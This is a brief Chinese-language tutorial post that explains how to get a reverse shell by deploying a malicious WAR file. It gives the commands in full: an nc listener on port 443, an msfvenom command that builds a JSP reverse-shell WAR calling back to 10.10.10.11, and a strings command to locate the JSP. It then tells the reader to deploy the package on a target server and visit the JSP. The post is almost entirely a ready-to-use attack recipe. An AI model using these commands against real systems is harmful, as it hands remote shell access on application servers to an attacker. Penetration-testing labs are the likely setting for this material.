# War文件反弹shell
首先在本地监听TCP协议443端口
“`
nc -lvp 443
“`
使用如下命令生成war文件:
“`bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.11 LPORT=443 -f war > reverse.war
“`
查看war包中shell的jsp文件名
“`bash
strings reverse.war | grep jsp
“`
在靶机上部署war包后,访问shell的jsp文件,即可在监听端口获得反弹shell
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容